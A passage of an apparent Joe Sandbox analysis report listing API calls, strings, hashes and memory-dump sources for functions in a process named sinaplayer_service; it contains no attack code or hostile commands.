                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003745FD
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037461A
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037463D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037464E
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037465E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00374672
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003746A2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$?sputc@?$basic_streambuf@StringU?$char_traits@_$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??3@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@BasicCountCurrentD@2@@std@@@1@@D@std@@D@std@@@1@@DebugNativeOsfx@?$basic_ostream@OutputPiece@ThreadTickV01@@V?$allocator@V?$allocator@_V?$basic_ostream@V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@W@std@@@std@@Wide@base@@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $0$ApnsHTTP.cpp$catch... m_strStatusText =
                                                                                                                                                                                                    • API String ID: 625621680-236822369
                                                                                                                                                                                                    • Opcode ID: 42db8be07a39fa0429b67b0283cb5b303be210e16520752aa090f6f8a4e7359c
                                                                                                                                                                                                    • Instruction ID: 06dde191b8476b2331310b016521369ee9d76bdfc372dfd759a5110f12cffc42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42db8be07a39fa0429b67b0283cb5b303be210e16520752aa090f6f8a4e7359c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1419675D00208ABCF22EBA4ED4B9CD77BCAF14345F0084D5E449A7292DB759B88CF61
                                                                                                                                                                                                    Function 6C6128B5 Relevance: 28.7, APIs: 19, Instructions: 244COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6C6128C2
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?,?,?), ref: 6C6128D0
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?), ref: 6C6128DC
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6C6128E8
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6C612B3B
                                                                                                                                                                                                    • __FCbuild.LIBCMT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C612B56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fdtest$Cbuild_cimagf_crealf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 791420253-0
                                                                                                                                                                                                    • Opcode ID: e28697928c526e8323bc4a5e412fbfd18cc58ffd1fed96e921b40253861fc5b6
                                                                                                                                                                                                    • Instruction ID: b416babcbaab7f412cb30bbe8ae9cd55f68488d40de661d00dafb375637b09a2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e28697928c526e8323bc4a5e412fbfd18cc58ffd1fed96e921b40253861fc5b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38815AB1D0810AEFCF056B99DA486EEBF74FF42306FA24984D09072998D7304A759F5D
                                                                                                                                                                                                    Function 6C576D17 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,?,00000180,00000000,6C576E91,00000004,6C576A4C,0000000C,6C573D89,0000000C,6C573E4B,?,00000000,?), ref: 6C576D29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6C576D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6C576D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6C576D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6C576D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6C576D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6C576DA3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C5648CA), ref: 6C5A379E
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,6C5648CA), ref: 6C5A37AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2340687224-19120757
                                                                                                                                                                                                    • Opcode ID: b1e66f491a0c853257b2a191cf42e4ef8633b2c08075de5920b5380de84f5488
                                                                                                                                                                                                    • Instruction ID: 027d60265d65acb94c4b6c4e26bef9fb7f3bfe1e34f9170822ea1613be7388cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1e66f491a0c853257b2a191cf42e4ef8633b2c08075de5920b5380de84f5488
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 641142317202109FDB389F26CDE597A7BB9EB8A600B04446FE906CB640DE75D844CBB4
                                                                                                                                                                                                    Function 00374AE0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,?), ref: 00374B26
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,?), ref: 00374B62
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374B88
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?,?,?,?), ref: 00374BA2
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?,?,?,?), ref: 00374BB7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 00374BD0
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00374BDA
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(?), ref: 00374C02
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?), ref: 00374C20
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374C39
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374C4E
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?), ref: 00374C66
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?), ref: 00374C84
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00374C8E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$memset$??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 2184721380-3788999226
                                                                                                                                                                                                    • Opcode ID: 86b7d816e26d91d05c4eb8ff2a75d07772aae111249ae3a9709005a8c22f2f17
                                                                                                                                                                                                    • Instruction ID: c7e2fc79aab4c9d4bb069df78b088ffcff6f0de03bb24bce53898d258a9a06c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86b7d816e26d91d05c4eb8ff2a75d07772aae111249ae3a9709005a8c22f2f17
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1514DB5A1011AAFCB19DF6CCD858AEBBB9FF48310B15866AE819D7350D731ED10CB90
                                                                                                                                                                                                    Function 6C576C80 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,00000000,?,?,?,?,6C576C6A), ref: 6C576C94
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoInitialize,?,?,?,?,6C576C6A), ref: 6C576CAD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576CB4
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoUninitialize,?,?,?,?,6C576C6A), ref: 6C576CD6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576CDD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6C576C6A), ref: 6C5A387A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6C576C6A), ref: 6C5A3886
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,6C576C6A), ref: 6C5A389C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,?,?,?,?,?,6C576C6A), ref: 6C5A38AA
                                                                                                                                                                                                    • _errno.MSVCR120(?,6C62CF40,?,?,?,?,?,6C576C6A), ref: 6C5A38B0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6C62CF40,?,?,?,?,?,6C576C6A), ref: 6C5A38BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionLibraryLoadThrow_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: RoInitialize$RoUninitialize$combase.dll$cl
                                                                                                                                                                                                    • API String ID: 885641006-3956676483
                                                                                                                                                                                                    • Opcode ID: 38a8b80c5a1447de7bca82aa9825729d4136b62fa0bbda1539241a519deab658
                                                                                                                                                                                                    • Instruction ID: 7d7098f1d530cd6910ffe9e874546ea66bd844ed8ace170bbfa433d5cd4a5f75
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38a8b80c5a1447de7bca82aa9825729d4136b62fa0bbda1539241a519deab658
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D311EB747112429BDF289FB79C9866F37BCFB06209F101829B51BCBA40EB35C4058BB9
                                                                                                                                                                                                    Function 0038FBC0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0038EBA0,8285FFAB,?,00000000,?), ref: 0038FC0A
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0038EBA0), ref: 0038FC17
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(rpcrt4.dll), ref: 0038FC28
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC3B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,UuidCreate), ref: 0038FC51
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC64
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038FCDD
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD09
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD2E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD53
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038FD64
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$CriticalSection$EnterLeave$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: .dmp$UuidCreate$rpcrt4.dll
                                                                                                                                                                                                    • API String ID: 811183846-2929501222
                                                                                                                                                                                                    • Opcode ID: 859bfa9784a7c8edbbea91175577c73e0ecdbefcb84f5761c6eb28d36d24c5eb
                                                                                                                                                                                                    • Instruction ID: 62e466dcb19811ba2df8d3b96d5bcf437b6d38f174e37ca7d4fd7536235d3902
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859bfa9784a7c8edbbea91175577c73e0ecdbefcb84f5761c6eb28d36d24c5eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69516EB1D10308EFCF12EFA5CC49B9EBBB8BF05310F00456AE509A7250EB35A958CB60
                                                                                                                                                                                                    Function 003718E0 Relevance: 24.2, APIs: 16, Instructions: 189COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                    • ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                    • ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?width@ios_base@std@@$?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3148193194-0
                                                                                                                                                                                                    • Opcode ID: 4df7be661b9894a282983dc8b37ed7110ec8270293653b37233e850de8386cd9
                                                                                                                                                                                                    • Instruction ID: 0f18a03418f52dd15ebf2a1321a621e13d4dc6a9d3527327e4505a2d638eeed3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4df7be661b9894a282983dc8b37ed7110ec8270293653b37233e850de8386cd9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5271A336A002459FCB22CF68C994B6DBBB5FF4A320F15C259E95A9B391D739DD01CB80
                                                                                                                                                                                                    Function 00376260 Relevance: 24.2, APIs: 16, Instructions: 164COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 003762A3
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762BA
                                                                                                                                                                                                    • ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762CB
                                                                                                                                                                                                    • ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 00376305
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376327
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00376332
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037635C
                                                                                                                                                                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 0037636D
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376392
                                                                                                                                                                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 0037639D
                                                                                                                                                                                                    • ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 003763C9
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                    • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                    Memory Dump Source
